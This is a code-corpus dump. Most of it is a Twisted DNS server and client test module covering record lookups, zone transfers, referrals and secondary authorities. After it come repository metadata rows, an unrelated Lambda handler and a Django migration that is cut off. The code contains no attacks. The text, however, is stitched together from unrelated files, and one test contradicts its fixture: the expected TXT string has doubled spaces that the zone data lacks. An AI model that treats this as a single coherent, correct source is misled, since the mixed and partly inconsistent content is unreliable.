    Deliberately bypasses C{FileAuthority.__init__} (which would parse a
    zone file) and initialises only the C{ResolverBase} machinery plus the
    supplied zone data.
    """
    def __init__(self, soa, records):
        # Skip FileAuthority.__init__ on purpose -- there is no file.
        common.ResolverBase.__init__(self)
        self.soa = soa
        self.records = records
# Shared SOA fixtures for the test zones below.  Note: ttl=1 / ttl=3 are the
# SOA records' own TTLs; the authority uses each zone SOA's `expire` value as
# the default TTL for records that do not set one (test_zoneTransfer below
# relies on this, hence the ttl=19283784 expectations throughout).
soa_record = dns.Record_SOA(
    mname = 'test-domain.com',
    rname = 'root.test-domain.com',
    serial = 100,
    refresh = 1234,
    minimum = 7654,
    expire = 19283784,
    retry = 15,
    ttl=1
    )
# SOA for the reverse (PTR) zone.
reverse_soa = dns.Record_SOA(
    mname = '93.84.28.in-addr.arpa',
    rname = '93.84.28.in-addr.arpa',
    serial = 120,
    refresh = 54321,
    minimum = 382,
    expire = 11193983,
    retry = 30,
    ttl=3
    )
# SOA with no explicit ttl; testSomeRecordsWithTTLs expects its TTL to
# default to the expire value (999999).
my_soa = dns.Record_SOA(
    mname = 'my-domain.com',
    rname = 'postmaster.test-domain.com',
    serial = 130,
    refresh = 12345,
    minimum = 1,
    expire = 999999,
    retry = 100,
    )
test_domain_com = NoFileAuthority(
soa = ('test-domain.com', soa_record),
records = {
'test-domain.com': [
soa_record,
dns.Record_A('127.0.0.1'),
dns.Record_NS('39.28.189.39'),
dns.Record_SPF('v=spf1 mx/30 mx:example.org/30 -all'),
dns.Record_SPF('v=spf1 +mx a:\0colo', '.example.com/28 -all not valid'),
dns.Record_MX(10, 'host.test-domain.com'),
dns.Record_HINFO(os='Linux', cpu='A Fast One, Dontcha know'),
dns.Record_CNAME('canonical.name.com'),
dns.Record_MB('mailbox.test-domain.com'),
dns.Record_MG('mail.group.someplace'),
dns.Record_TXT('A First piece of Text', 'a SecoNd piece'),
dns.Record_A6(0, 'ABCD::4321', ''),
dns.Record_A6(12, '0:0069::0', 'some.network.tld'),
dns.Record_A6(8, '0:5634:1294:AFCB:56AC:48EF:34C3:01FF', 'tra.la.la.net'),
dns.Record_TXT('Some more text, haha! Yes. \0 Still here?'),
dns.Record_MR('mail.redirect.or.whatever'),
dns.Record_MINFO(rmailbx='r mail box', emailbx='e mail box'),
dns.Record_AFSDB(subtype=1, hostname='afsdb.test-domain.com'),
dns.Record_RP(mbox='whatever.i.dunno', txt='some.more.text'),
dns.Record_WKS('12.54.78.12', socket.IPPROTO_TCP,
'\x12\x01\x16\xfe\xc1\x00\x01'),
dns.Record_NAPTR(100, 10, "u", "sip+E2U",
"!^.*$!sip:information@domain.tld!"),
dns.Record_AAAA('AF43:5634:1294:AFCB:56AC:48EF:34C3:01FF')],
'http.tcp.test-domain.com': [
dns.Record_SRV(257, 16383, 43690, 'some.other.place.fool')
],
'host.test-domain.com': [
dns.Record_A('123.242.1.5'),
dns.Record_A('0.255.0.255'),
],
'host-two.test-domain.com': [
#
# Python bug
# dns.Record_A('255.255.255.255'),
#
dns.Record_A('255.255.255.254'),
dns.Record_A('0.0.0.0')
],
'cname.test-domain.com': [
dns.Record_CNAME('test-domain.com')
],
'anothertest-domain.com': [
dns.Record_A('1.2.3.4')],
}
)
reverse_domain = NoFileAuthority(
soa = ('93.84.28.in-addr.arpa', reverse_soa),
records = {
'123.93.84.28.in-addr.arpa': [
dns.Record_PTR('test.host-reverse.lookup.com'),
reverse_soa
]
}
)
my_domain_com = NoFileAuthority(
soa = ('my-domain.com', my_soa),
records = {
'my-domain.com': [
my_soa,
dns.Record_A('1.2.3.4', ttl='1S'),
dns.Record_NS('ns1.domain', ttl='2M'),
dns.Record_NS('ns2.domain', ttl='3H'),
dns.Record_SRV(257, 16383, 43690, 'some.other.place.fool', ttl='4D')
]
}
)
class ServerDNSTestCase(unittest.TestCase):
    """
    Test cases for DNS server and client.
    """
    def setUp(self):
        """
        Start a DNS server listening on the same port number over both TCP
        and UDP, backed by the module-level test authorities, and create a
        client resolver pointed at it.
        """
        self.factory = server.DNSServerFactory([
            test_domain_com, reverse_domain, my_domain_com
        ], verbose=2)
        p = dns.DNSDatagramProtocol(self.factory)
        # Find a port usable for both transports: bind TCP on an ephemeral
        # port, then try UDP on the same number; retry on collision.
        while 1:
            listenerTCP = reactor.listenTCP(0, self.factory, interface="127.0.0.1")
            # It's simpler to do the stop listening with addCleanup,
            # even though we might not end up using this TCP port in
            # the test (if the listenUDP below fails). Cleaning up
            # this TCP port sooner than "cleanup time" would mean
            # adding more code to keep track of the Deferred returned
            # by stopListening.
            self.addCleanup(listenerTCP.stopListening)
            port = listenerTCP.getHost().port
            try:
                listenerUDP = reactor.listenUDP(port, p, interface="127.0.0.1")
            except error.CannotListenError:
                pass
            else:
                self.addCleanup(listenerUDP.stopListening)
                break
        self.listenerTCP = listenerTCP
        self.listenerUDP = listenerUDP
        self.resolver = client.Resolver(servers=[('127.0.0.1', port)])
    def tearDown(self):
        """
        Clean up any server connections associated with the
        L{DNSServerFactory} created in L{setUp}
        """
        # It'd be great if DNSServerFactory had a method that
        # encapsulated this task. At least the necessary data is
        # available, though.
        for conn in self.factory.connections[:]:
            conn.transport.loseConnection()
    def namesTest(self, querying, expectedRecords):
        """
        Assert that the DNS response C{querying} will eventually fire with
        contains exactly a certain collection of records.
        @param querying: A L{Deferred} returned from one of the DNS client
            I{lookup} methods.
        @param expectedRecords: A L{list} of L{IRecord} providers which must be
            in the response or the test will be failed.
        @return: A L{Deferred} that fires when the assertion has been made. It
            fires with a success result if the assertion succeeds and with a
            L{Failure} if it fails.
        """
        def checkResults(response):
            # Compare as sets: answer ordering is not part of the contract.
            receivedRecords = justPayload(response)
            self.assertEqual(set(expectedRecords), set(receivedRecords))
        querying.addCallback(checkResults)
        return querying
    def testAddressRecord1(self):
        """Test simple DNS 'A' record queries"""
        return self.namesTest(
            self.resolver.lookupAddress('test-domain.com'),
            [dns.Record_A('127.0.0.1', ttl=19283784)]
        )
    def testAddressRecord2(self):
        """Test DNS 'A' record queries with multiple answers"""
        return self.namesTest(
            self.resolver.lookupAddress('host.test-domain.com'),
            [dns.Record_A('123.242.1.5', ttl=19283784), dns.Record_A('0.255.0.255', ttl=19283784)]
        )
    def testAddressRecord3(self):
        """Test DNS 'A' record queries with edge cases"""
        return self.namesTest(
            self.resolver.lookupAddress('host-two.test-domain.com'),
            [dns.Record_A('255.255.255.254', ttl=19283784), dns.Record_A('0.0.0.0', ttl=19283784)]
        )
    def testAuthority(self):
        """Test DNS 'SOA' record queries"""
        return self.namesTest(
            self.resolver.lookupAuthority('test-domain.com'),
            [soa_record]
        )
    def test_mailExchangeRecord(self):
        """
        The DNS client can issue an MX query and receive a response including
        an MX record as well as any A record hints.
        """
        return self.namesTest(
            self.resolver.lookupMailExchange(b"test-domain.com"),
            [dns.Record_MX(10, b"host.test-domain.com", ttl=19283784),
             dns.Record_A(b"123.242.1.5", ttl=19283784),
             dns.Record_A(b"0.255.0.255", ttl=19283784)])
    def testNameserver(self):
        """Test DNS 'NS' record queries"""
        return self.namesTest(
            self.resolver.lookupNameservers('test-domain.com'),
            [dns.Record_NS('39.28.189.39', ttl=19283784)]
        )
    def testHINFO(self):
        """Test DNS 'HINFO' record queries"""
        return self.namesTest(
            self.resolver.lookupHostInfo('test-domain.com'),
            [dns.Record_HINFO(os='Linux', cpu='A Fast One, Dontcha know', ttl=19283784)]
        )
    def testPTR(self):
        """Test DNS 'PTR' record queries"""
        return self.namesTest(
            self.resolver.lookupPointer('123.93.84.28.in-addr.arpa'),
            [dns.Record_PTR('test.host-reverse.lookup.com', ttl=11193983)]
        )
    def testCNAME(self):
        """Test DNS 'CNAME' record queries"""
        return self.namesTest(
            self.resolver.lookupCanonicalName('test-domain.com'),
            [dns.Record_CNAME('canonical.name.com', ttl=19283784)]
        )
    def testMB(self):
        """Test DNS 'MB' record queries"""
        return self.namesTest(
            self.resolver.lookupMailBox('test-domain.com'),
            [dns.Record_MB('mailbox.test-domain.com', ttl=19283784)]
        )
    def testMG(self):
        """Test DNS 'MG' record queries"""
        return self.namesTest(
            self.resolver.lookupMailGroup('test-domain.com'),
            [dns.Record_MG('mail.group.someplace', ttl=19283784)]
        )
    def testMR(self):
        """Test DNS 'MR' record queries"""
        return self.namesTest(
            self.resolver.lookupMailRename('test-domain.com'),
            [dns.Record_MR('mail.redirect.or.whatever', ttl=19283784)]
        )
    def testMINFO(self):
        """Test DNS 'MINFO' record queries"""
        return self.namesTest(
            self.resolver.lookupMailboxInfo('test-domain.com'),
            [dns.Record_MINFO(rmailbx='r mail box', emailbx='e mail box', ttl=19283784)]
        )
    def testSRV(self):
        """Test DNS 'SRV' record queries"""
        return self.namesTest(
            self.resolver.lookupService('http.tcp.test-domain.com'),
            [dns.Record_SRV(257, 16383, 43690, 'some.other.place.fool', ttl=19283784)]
        )
    def testAFSDB(self):
        """Test DNS 'AFSDB' record queries"""
        return self.namesTest(
            self.resolver.lookupAFSDatabase('test-domain.com'),
            [dns.Record_AFSDB(subtype=1, hostname='afsdb.test-domain.com', ttl=19283784)]
        )
    def testRP(self):
        """Test DNS 'RP' record queries"""
        return self.namesTest(
            self.resolver.lookupResponsibility('test-domain.com'),
            [dns.Record_RP(mbox='whatever.i.dunno', txt='some.more.text', ttl=19283784)]
        )
    def testTXT(self):
        """Test DNS 'TXT' record queries"""
        return self.namesTest(
            self.resolver.lookupText('test-domain.com'),
            [dns.Record_TXT('A First piece of Text', 'a SecoNd piece', ttl=19283784),
             dns.Record_TXT('Some more text, haha!  Yes.  \0  Still here?', ttl=19283784)]
        )
    def test_spf(self):
        """
        L{DNSServerFactory} can serve I{SPF} resource records.
        """
        return self.namesTest(
            self.resolver.lookupSenderPolicy('test-domain.com'),
            [dns.Record_SPF('v=spf1 mx/30 mx:example.org/30 -all', ttl=19283784),
             dns.Record_SPF('v=spf1 +mx a:\0colo', '.example.com/28 -all not valid', ttl=19283784)]
        )
    def testWKS(self):
        """Test DNS 'WKS' record queries"""
        return self.namesTest(
            self.resolver.lookupWellKnownServices('test-domain.com'),
            [dns.Record_WKS('12.54.78.12', socket.IPPROTO_TCP, '\x12\x01\x16\xfe\xc1\x00\x01', ttl=19283784)]
        )
    def testSomeRecordsWithTTLs(self):
        """
        All-records lookup: explicit per-record TTLs are preserved, and the
        SOA record's TTL defaults to its own expire value.
        """
        result_soa = copy.copy(my_soa)
        result_soa.ttl = my_soa.expire
        return self.namesTest(
            self.resolver.lookupAllRecords('my-domain.com'),
            [result_soa,
             dns.Record_A('1.2.3.4', ttl='1S'),
             dns.Record_NS('ns1.domain', ttl='2M'),
             dns.Record_NS('ns2.domain', ttl='3H'),
             dns.Record_SRV(257, 16383, 43690, 'some.other.place.fool', ttl='4D')]
            )
    def testAAAA(self):
        """Test DNS 'AAAA' record queries (IPv6)"""
        return self.namesTest(
            self.resolver.lookupIPV6Address('test-domain.com'),
            [dns.Record_AAAA('AF43:5634:1294:AFCB:56AC:48EF:34C3:01FF', ttl=19283784)]
        )
    def testA6(self):
        """Test DNS 'A6' record queries (IPv6)"""
        return self.namesTest(
            self.resolver.lookupAddress6('test-domain.com'),
            [dns.Record_A6(0, 'ABCD::4321', '', ttl=19283784),
             dns.Record_A6(12, '0:0069::0', 'some.network.tld', ttl=19283784),
             dns.Record_A6(8, '0:5634:1294:AFCB:56AC:48EF:34C3:01FF', 'tra.la.la.net', ttl=19283784)]
        )
    def test_zoneTransfer(self):
        """
        Test DNS 'AXFR' queries (Zone transfer)
        """
        default_ttl = soa_record.expire
        results = [copy.copy(r) for r in reduce(operator.add, test_domain_com.records.values())]
        for r in results:
            if r.ttl is None:
                r.ttl = default_ttl
        return self.namesTest(
            # [:-1] drops the trailing SOA that terminates the AXFR stream
            # before comparing against the zone contents.
            self.resolver.lookupZone('test-domain.com').addCallback(lambda r: (r[0][:-1],)),
            results
        )
    def testSimilarZonesDontInterfere(self):
        """Tests that unrelated zones don't mess with each other."""
        return self.namesTest(
            self.resolver.lookupAddress("anothertest-domain.com"),
            [dns.Record_A('1.2.3.4', ttl=19283784)]
        )
    def test_NAPTR(self):
        """
        Test DNS 'NAPTR' record queries.
        """
        return self.namesTest(
            self.resolver.lookupNamingAuthorityPointer('test-domain.com'),
            [dns.Record_NAPTR(100, 10, "u", "sip+E2U",
                              "!^.*$!sip:information@domain.tld!",
                              ttl=19283784)])
class HelperTestCase(unittest.TestCase):
    def testSerialGenerator(self):
        """
        Successive calls to L{authority.getSerial} against the same state
        file must produce strictly increasing serial numbers.
        """
        stateFile = self.mktemp()
        previous = authority.getSerial(stateFile)
        for _ in range(20):
            current = authority.getSerial(stateFile)
            self.assertTrue(previous < current)
            previous = current
class AXFRTest(unittest.TestCase):
    """
    Tests for L{client.AXFRController}'s handling of zone-transfer
    responses, both as one big message (BIND style) and as one message
    per record (djbdns style).
    """
    def setUp(self):
        self.results = None
        self.d = defer.Deferred()
        self.d.addCallback(self._gotResults)
        self.controller = client.AXFRController('fooby.com', self.d)
        # An AXFR stream is framed by the zone SOA appearing first and last;
        # self.soa is therefore used at both ends of self.records.
        self.soa = dns.RRHeader(name='fooby.com', type=dns.SOA, cls=dns.IN, ttl=86400, auth=False,
                                payload=dns.Record_SOA(mname='fooby.com',
                                                       rname='hooj.fooby.com',
                                                       serial=100,
                                                       refresh=200,
                                                       retry=300,
                                                       expire=400,
                                                       minimum=500,
                                                       ttl=600))
        self.records = [
            self.soa,
            dns.RRHeader(name='fooby.com', type=dns.NS, cls=dns.IN, ttl=700, auth=False,
                         payload=dns.Record_NS(name='ns.twistedmatrix.com', ttl=700)),
            dns.RRHeader(name='fooby.com', type=dns.MX, cls=dns.IN, ttl=700, auth=False,
                         payload=dns.Record_MX(preference=10, exchange='mail.mv3d.com', ttl=700)),
            dns.RRHeader(name='fooby.com', type=dns.A, cls=dns.IN, ttl=700, auth=False,
                         payload=dns.Record_A(address='64.123.27.105', ttl=700)),
            self.soa
            ]
    def _makeMessage(self):
        # hooray they all have the same message format
        return dns.Message(id=999, answer=1, opCode=0, recDes=0, recAv=1, auth=1, rCode=0, trunc=0, maxSize=0)
    def testBindAndTNamesStyle(self):
        # Bind style = One big single message
        m = self._makeMessage()
        m.queries = [dns.Query('fooby.com', dns.AXFR, dns.IN)]
        m.answers = self.records
        self.controller.messageReceived(m, None)
        self.assertEqual(self.results, self.records)
    def _gotResults(self, result):
        # Callback for self.d; captures the completed transfer.
        self.results = result
    def testDJBStyle(self):
        # DJB style = message per record
        records = self.records[:]
        while records:
            m = self._makeMessage()
            m.queries = [] # DJB *doesn't* specify any queries.. hmm..
            m.answers = [records.pop(0)]
            self.controller.messageReceived(m, None)
        self.assertEqual(self.results, self.records)
class ResolvConfHandling(unittest.TestCase):
    """
    Tests for L{client.Resolver}'s handling of a missing or empty
    resolv.conf: in both cases it must fall back to querying localhost.
    """
    def testMissing(self):
        """
        A nonexistent resolv.conf results in the 127.0.0.1:53 fallback.
        """
        resolvConf = self.mktemp()
        r = client.Resolver(resolv=resolvConf)
        self.assertEqual(r.dynServers, [('127.0.0.1', 53)])
        # Cancel the periodic re-parse so no delayed call outlives the test.
        r._parseCall.cancel()
    def testEmpty(self):
        """
        An empty resolv.conf also results in the 127.0.0.1:53 fallback.
        """
        resolvConf = self.mktemp()
        # Use open() rather than the Python-2-only file() builtin (removed in
        # Python 3), and close deterministically via a context manager.
        with open(resolvConf, 'w'):
            pass
        r = client.Resolver(resolv=resolvConf)
        self.assertEqual(r.dynServers, [('127.0.0.1', 53)])
        r._parseCall.cancel()
class AuthorityTests(unittest.TestCase):
    """
    Tests for the basic response record selection code in L{FileAuthority}
    (independent of its fileness).
    """
    def test_domainErrorForNameWithCommonSuffix(self):
        """
        L{FileAuthority} lookup methods errback with L{DomainError} if
        the requested C{name} shares a common suffix with its zone but
        is not actually a descendant of its zone, in terms of its
        sequence of DNS name labels. eg www.the-example.com has
        nothing to do with the zone example.com.
        """
        testDomain = test_domain_com
        testDomainName = 'nonexistent.prefix-' + testDomain.soa[0]
        f = self.failureResultOf(testDomain.lookupAddress(testDomainName))
        self.assertIsInstance(f.value, DomainError)
    def test_recordMissing(self):
        """
        If a L{FileAuthority} has a zone which includes an I{NS} record for a
        particular name and that authority is asked for another record for the
        same name which does not exist, the I{NS} record is not included in the
        authority section of the response.
        """
        authority = NoFileAuthority(
            soa=(str(soa_record.mname), soa_record),
            records={
                str(soa_record.mname): [
                    soa_record,
                    dns.Record_NS('1.2.3.4'),
                    ]})
        d = authority.lookupAddress(str(soa_record.mname))
        result = []
        d.addCallback(result.append)
        # NoFileAuthority lookups fire synchronously, so the result is
        # available immediately after addCallback.
        answer, authority, additional = result[0]
        self.assertEqual(answer, [])
        self.assertEqual(
            authority, [
                dns.RRHeader(
                    str(soa_record.mname), soa_record.TYPE,
                    ttl=soa_record.expire, payload=soa_record,
                    auth=True)])
        self.assertEqual(additional, [])
    def _referralTest(self, method):
        """
        Create an authority and make a request against it. Then verify that the
        result is a referral, including no records in the answers or additional
        sections, but with an I{NS} record in the authority section.
        """
        subdomain = 'example.' + str(soa_record.mname)
        nameserver = dns.Record_NS('1.2.3.4')
        authority = NoFileAuthority(
            soa=(str(soa_record.mname), soa_record),
            records={
                subdomain: [
                    nameserver,
                    ]})
        d = getattr(authority, method)(subdomain)
        answer, authority, additional = self.successResultOf(d)
        self.assertEqual(answer, [])
        self.assertEqual(
            authority, [dns.RRHeader(
                subdomain, dns.NS, ttl=soa_record.expire,
                payload=nameserver, auth=False)])
        self.assertEqual(additional, [])
    def test_referral(self):
        """
        When an I{NS} record is found for a child zone, it is included in the
        authority section of the response. It is marked as non-authoritative if
        the authority is not also authoritative for the child zone (RFC 2181,
        section 6.1).
        """
        self._referralTest('lookupAddress')
    def test_allRecordsReferral(self):
        """
        A referral is also generated for a request of type C{ALL_RECORDS}.
        """
        self._referralTest('lookupAllRecords')
class AdditionalProcessingTests(unittest.TestCase):
    """
    Tests for L{FileAuthority}'s additional processing for those record types
    which require it (MX, CNAME, etc).
    """
    # Address payloads reused by every scenario below.
    _A = dns.Record_A(b"10.0.0.1")
    _AAAA = dns.Record_AAAA(b"f080::1")
    def _lookupSomeRecords(self, method, soa, makeRecord, target, addresses):
        """
        Perform a DNS lookup against a L{FileAuthority} configured with records
        as defined by C{makeRecord} and C{addresses}.
        @param method: The name of the lookup method to use; for example,
            C{"lookupNameservers"}.
        @type method: L{str}
        @param soa: A L{Record_SOA} for the zone for which the L{FileAuthority}
            is authoritative.
        @param makeRecord: A one-argument callable which accepts a name and
            returns an L{IRecord} provider.  L{FileAuthority} is constructed
            with this record.  The L{FileAuthority} is queried for a record of
            the resulting type with the given name.
        @param target: The extra name which the record returned by
            C{makeRecord} will be pointed at; this is the name which might
            require extra processing by the server so that all the available,
            useful information is returned.  For example, this is the target of
            a CNAME record or the mail exchange host pointed to by an MX record.
        @type target: L{bytes}
        @param addresses: A L{list} of records giving addresses of C{target}.
        @return: A L{Deferred} that fires with the result of the resolver
            method give by C{method}.
        """
        authority = NoFileAuthority(
            soa=(soa.mname.name, soa),
            records={
                soa.mname.name: [makeRecord(target)],
                target: addresses,
                },
            )
        # NOTE(review): queries soa_record.mname.name rather than the `soa`
        # parameter's mname; equivalent for all current callers (they pass
        # soa_record), but `soa.mname.name` would be more consistent.
        return getattr(authority, method)(soa_record.mname.name)
    def assertRecordsMatch(self, expected, computed):
        """
        Assert that the L{RRHeader} instances given by C{expected} and
        C{computed} carry all the same information but without requiring the
        records appear in the same order.
        @param expected: A L{list} of L{RRHeader} instances giving the expected
            records.
        @param computed: A L{list} of L{RRHeader} instances giving the records
            computed by the scenario under test.
        @raise self.failureException: If the two collections of records disagree.
        """
        # RRHeader instances aren't inherently ordered.  Impose an ordering
        # that's good enough for the purposes of these tests - in which we
        # never have more than one record of a particular type.
        key = lambda rr: rr.type
        self.assertEqual(sorted(expected, key=key), sorted(computed, key=key))
    def _additionalTest(self, method, makeRecord, addresses):
        """
        Verify that certain address records are included in the I{additional}
        section of a response generated by L{FileAuthority}.
        @param method: See L{_lookupSomeRecords}
        @param makeRecord: See L{_lookupSomeRecords}
        @param addresses: A L{list} of L{IRecord} providers which the
            I{additional} section of the response is required to match
            (ignoring order).
        @raise self.failureException: If the I{additional} section of the
            response consists of different records than those given by
            C{addresses}.
        """
        target = b"mail." + soa_record.mname.name
        d = self._lookupSomeRecords(
            method, soa_record, makeRecord, target, addresses)
        answer, authority, additional = self.successResultOf(d)
        self.assertRecordsMatch(
            [dns.RRHeader(
                    target, address.TYPE, ttl=soa_record.expire, payload=address,
                    auth=True)
             for address in addresses],
            additional)
    def _additionalMXTest(self, addresses):
        """
        Verify that a response to an MX query has certain records in the
        I{additional} section.
        @param addresses: See C{_additionalTest}
        """
        self._additionalTest(
            "lookupMailExchange", partial(dns.Record_MX, 10), addresses)
    def test_mailExchangeAdditionalA(self):
        """
        If the name of the MX response has A records, they are included in the
        additional section of the response.
        """
        self._additionalMXTest([self._A])
    def test_mailExchangeAdditionalAAAA(self):
        """
        If the name of the MX response has AAAA records, they are included in
        the additional section of the response.
        """
        self._additionalMXTest([self._AAAA])
    def test_mailExchangeAdditionalBoth(self):
        """
        If the name of the MX response has both A and AAAA records, they are
        all included in the additional section of the response.
        """
        self._additionalMXTest([self._A, self._AAAA])
    def _additionalNSTest(self, addresses):
        """
        Verify that a response to an NS query has certain records in the
        I{additional} section.
        @param addresses: See C{_additionalTest}
        """
        self._additionalTest(
            "lookupNameservers", dns.Record_NS, addresses)
    def test_nameserverAdditionalA(self):
        """
        If the name of the NS response has A records, they are included in the
        additional section of the response.
        """
        self._additionalNSTest([self._A])
    def test_nameserverAdditionalAAAA(self):
        """
        If the name of the NS response has AAAA records, they are included in
        the additional section of the response.
        """
        self._additionalNSTest([self._AAAA])
    def test_nameserverAdditionalBoth(self):
        """
        If the name of the NS response has both A and AAAA records, they are
        all included in the additional section of the response.
        """
        self._additionalNSTest([self._A, self._AAAA])
    def _answerCNAMETest(self, addresses):
        """
        Verify that a response to a CNAME query has certain records in the
        I{answer} section.
        @param addresses: See C{_additionalTest}
        """
        target = b"www." + soa_record.mname.name
        d = self._lookupSomeRecords(
            "lookupCanonicalName", soa_record, dns.Record_CNAME, target,
            addresses)
        answer, authority, additional = self.successResultOf(d)
        alias = dns.RRHeader(
            soa_record.mname.name, dns.CNAME, ttl=soa_record.expire,
            payload=dns.Record_CNAME(target), auth=True)
        self.assertRecordsMatch(
            [dns.RRHeader(
                    target, address.TYPE, ttl=soa_record.expire, payload=address,
                    auth=True)
             for address in addresses] + [alias],
            answer)
    def test_canonicalNameAnswerA(self):
        """
        If the name of the CNAME response has A records, they are included in
        the answer section of the response.
        """
        self._answerCNAMETest([self._A])
    def test_canonicalNameAnswerAAAA(self):
        """
        If the name of the CNAME response has AAAA records, they are included
        in the answer section of the response.
        """
        self._answerCNAMETest([self._AAAA])
    def test_canonicalNameAnswerBoth(self):
        """
        If the name of the CNAME response has both A and AAAA records, they are
        all included in the answer section of the response.
        """
        self._answerCNAMETest([self._A, self._AAAA])
class NoInitialResponseTestCase(unittest.TestCase):
    def test_no_answer(self):
        """
        If a request returns a L{dns.NS} response, but we can't connect to the
        given server, the request fails with the error returned at connection.
        """
        def query(self, *args):
            # Pop from the message list, so that it blows up if more queries
            # are run than expected.
            return succeed(messages.pop(0))
        def queryProtocol(self, *args, **kwargs):
            # Stand-in for DNSDatagramProtocol.query that always fails as if
            # the network connection could not be made.
            return defer.fail(socket.gaierror("Couldn't connect"))
        resolver = Resolver(servers=[('0.0.0.0', 0)])
        resolver._query = query
        messages = []
        # Let's patch dns.DNSDatagramProtocol.query, as there is no easy way to
        # customize it.
        self.patch(dns.DNSDatagramProtocol, "query", queryProtocol)
        # NOTE(review): the record name 'fooba.com' differs from the queried
        # name 'fooby.com' below -- presumably harmless here because the
        # connection attempt fails before the answer matters, but confirm.
        records = [
            dns.RRHeader(name='fooba.com', type=dns.NS, cls=dns.IN, ttl=700,
                         auth=False,
                         payload=dns.Record_NS(name='ns.twistedmatrix.com',
                                               ttl=700))]
        m = dns.Message(id=999, answer=1, opCode=0, recDes=0, recAv=1, auth=1,
                        rCode=0, trunc=0, maxSize=0)
        m.answers = records
        messages.append(m)
        return self.assertFailure(
            resolver.getHostByName("fooby.com"), socket.gaierror)
class SecondaryAuthorityServiceTests(unittest.TestCase):
    """
    Tests for L{SecondaryAuthorityService}, a service which keeps one or more
    authorities up to date by doing zone transfers from a master.
    """
    def test_constructAuthorityFromHost(self):
        """
        L{SecondaryAuthorityService} can be constructed with a C{str} giving a
        master server address and several domains, causing the creation of a
        secondary authority for each domain and that master server address and
        the default DNS port.
        """
        primary = '192.168.1.2'
        service = SecondaryAuthorityService(
            primary, ['example.com', 'example.org'])
        self.assertEqual(service.primary, primary)
        self.assertEqual(service._port, 53)
        # One SecondaryAuthority per domain, in input order.
        self.assertEqual(service.domains[0].primary, primary)
        self.assertEqual(service.domains[0]._port, 53)
        self.assertEqual(service.domains[0].domain, 'example.com')
        self.assertEqual(service.domains[1].primary, primary)
        self.assertEqual(service.domains[1]._port, 53)
        self.assertEqual(service.domains[1].domain, 'example.org')
    def test_constructAuthorityFromHostAndPort(self):
        """
        L{SecondaryAuthorityService.fromServerAddressAndDomains} constructs a
        new L{SecondaryAuthorityService} from a C{str} giving a master server
        address and DNS port and several domains, causing the creation of a secondary
        authority for each domain and that master server address and the given
        DNS port.
        """
        primary = '192.168.1.3'
        port = 5335
        service = SecondaryAuthorityService.fromServerAddressAndDomains(
            (primary, port), ['example.net', 'example.edu'])
        self.assertEqual(service.primary, primary)
        self.assertEqual(service._port, 5335)
        self.assertEqual(service.domains[0].primary, primary)
        self.assertEqual(service.domains[0]._port, port)
        self.assertEqual(service.domains[0].domain, 'example.net')
        self.assertEqual(service.domains[1].primary, primary)
        self.assertEqual(service.domains[1]._port, port)
        self.assertEqual(service.domains[1].domain, 'example.edu')
class SecondaryAuthorityTests(unittest.TestCase):
    """
    L{twisted.names.secondary.SecondaryAuthority} correctly constructs objects
    with a specified IP address and optionally specified DNS port.
    """
    def test_defaultPort(self):
        """
        When constructed using L{SecondaryAuthority.__init__}, the default port
        of 53 is used.
        """
        secondary = SecondaryAuthority('192.168.1.1', 'inside.com')
        self.assertEqual(secondary.primary, '192.168.1.1')
        self.assertEqual(secondary._port, 53)
        self.assertEqual(secondary.domain, 'inside.com')
    def test_explicitPort(self):
        """
        When constructed using L{SecondaryAuthority.fromServerAddressAndDomain},
        the specified port is used.
        """
        secondary = SecondaryAuthority.fromServerAddressAndDomain(
            ('192.168.1.1', 5353), 'inside.com')
        self.assertEqual(secondary.primary, '192.168.1.1')
        self.assertEqual(secondary._port, 5353)
        self.assertEqual(secondary.domain, 'inside.com')
    def test_transfer(self):
        """
        An attempt is made to transfer the zone for the domain the
        L{SecondaryAuthority} was constructed with from the server address it
        was constructed with when L{SecondaryAuthority.transfer} is called.
        """
        secondary = SecondaryAuthority.fromServerAddressAndDomain(
            ('192.168.1.2', 1234), 'example.com')
        # MemoryReactorClock records connection attempts instead of making
        # real ones; they are inspected via reactor.tcpClients below.
        secondary._reactor = reactor = MemoryReactorClock()
        secondary.transfer()
        # Verify a connection attempt to the server address above
        host, port, factory, timeout, bindAddress = reactor.tcpClients.pop(0)
        self.assertEqual(host, '192.168.1.2')
        self.assertEqual(port, 1234)
        # See if a zone transfer query is issued.
        proto = factory.buildProtocol((host, port))
        transport = StringTransport()
        proto.makeConnection(transport)
        msg = Message()
        # DNSProtocol.writeMessage length encodes the message by prepending a
        # 2 byte message length to the buffered value.
        msg.decode(StringIO(transport.value()[2:]))
        self.assertEqual(
            [dns.Query('example.com', dns.AXFR, dns.IN)], msg.queries)
| [
"l”ibaojunqd@foxmail.com“"
] | l”ibaojunqd@foxmail.com“ |
a049f488ea3a7be28b9825bef61e359ef3aa547c | d2aa33baeabc1bfb92cef62e22422fe36c75e42f | /order/api/postPayment/requestDelivery.py | 6ecaec644edc8f440604fbd4930f63e00b4950cc | [] | no_license | twkiiim/jawsdays2020-demo-serverless-order-service | 6a1e1189ff2b6402bb390f28a5362d65f34f108c | fdaf55c5e80e64d9de92b5c8bb8dc7ad4ae36916 | refs/heads/master | 2023-02-08T10:21:44.675790 | 2020-03-27T11:19:18 | 2020-03-27T11:19:18 | 250,514,918 | 9 | 3 | null | 2023-01-24T01:44:03 | 2020-03-27T11:18:13 | TypeScript | UTF-8 | Python | false | false | 225 | py | import random
def handler(event, context):
randVal = random.random()
if randVal > 0.01:
return 'delivery successfully requested!'
else:
raise Exception('delivery request (randomly) failed')
| [
"twkiiim@gmail.com"
] | twkiiim@gmail.com |
d1f1d103d079eb17e04d8229327ff103e8fb3764 | 3c65c697ddfade65a74bdb4ae27bd41a7ce171d2 | /paymentapp/migrations/0010_emp_basic_update_emp_leaves_emp_pal_slip.py | 423da004ca774cc2cb03a8ddeacc504d686d0dc9 | [] | no_license | pedhababu/-Online-Payroll-System | cc1d776d93afc31c7ddd41937d67df4d41f57c5d | 9c20c91abd69971ca5e557ded574c8dfad7db42f | refs/heads/main | 2023-01-30T06:30:49.913482 | 2020-12-14T05:05:44 | 2020-12-14T05:05:44 | 318,046,559 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,693 | py | # Generated by Django 2.0.7 on 2018-12-24 11:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('paymentapp', '0009_finance_login'),
]
operations = [
migrations.CreateModel(
name='Emp_basic_update',
fields=[
('empid', models.CharField(max_length=8, primary_key=True, serialize=False)),
('basicpay', models.DecimalField(decimal_places=2, max_digits=10)),
],
),
migrations.CreateModel(
name='Emp_Leaves',
fields=[
